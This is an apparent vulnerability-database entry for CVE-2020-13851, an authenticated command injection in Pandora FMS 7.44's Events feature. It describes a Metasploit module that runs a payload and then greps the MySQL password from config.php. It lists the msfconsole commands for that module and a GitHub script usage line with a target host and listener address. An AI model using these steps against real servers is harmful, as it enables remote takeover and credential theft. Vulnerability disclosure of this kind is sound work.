940
VMScore

CVE-2020-13851

Published: 11/06/2020 Updated: 27/04/2022
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 940
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Artica Pandora FMS 7.44 allows remote command execution via the events feature.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

pandorafms pandora fms 7.44

Exploits

This Metasploit module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 70 NG 742, 70 NG 743, and 70 NG 744 (and perhaps older versions) in order to execute arbitrary commands This module takes advantage of a command injection vulnerability in th e Events feature of Pandora FMS This flaw allows users to execute arbitrary comma ...
This module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 70 NG 742, 70 NG 743, and 70 NG 744 (and perhaps older versions) in order to execute arbitrary commands This module takes advantage of a command injection vulnerability in the `Events` feature of Pandora FMS This flaw allows u ...

Metasploit Modules

Pandora FMS Events Remote Command Execution

This module exploits a vulnerability (CVE-2020-13851) in Pandora FMS versions 7.0 NG 742, 7.0 NG 743, and 7.0 NG 744 (and perhaps older versions) in order to execute arbitrary commands. This module takes advantage of a command injection vulnerability in the `Events` feature of Pandora FMS. This flaw allows users to execute arbitrary commands via the `target` parameter in HTTP POST requests to the `Events` function. After authenticating to the target, the module attempts to exploit this flaw by issuing such an HTTP POST request, with the `target` parameter set to contain the payload. If a shell is obtained, the module will try to obtain the local MySQL database password via a simple `grep` command on the plaintext `/var/www/html/pandora_console/include/config.php` file. Valid credentials for a Pandora FMS account are required. The account does not need to have admin privileges. This module has been successfully tested on Pandora 7.0 NG 744 running on CentOS 7 (the official virtual appliance ISO for this version).

msf > use exploit/linux/http/pandora_fms_events_exec
msf exploit(pandora_fms_events_exec) > show targets
    ...targets...
msf exploit(pandora_fms_events_exec) > set TARGET < target-id >
msf exploit(pandora_fms_events_exec) > show options
    ...show and set options...
msf exploit(pandora_fms_events_exec) > exploit

Github Repositories

CVE-2020-13851 Pandora FMS 7.44

Pandora FMS 744 CVE-2020-13851 Pandora FMS 744 CVE-2020-13851 RCE allows an authenticated user to achieve remote command execution via the events feature Can be done with credentials or a PHP session cookie Getting Started Executing program Using credentials python3 pandorafms_744py -t pwnedpandoracom/ -u username -p password -lhost 127001 -lport 1337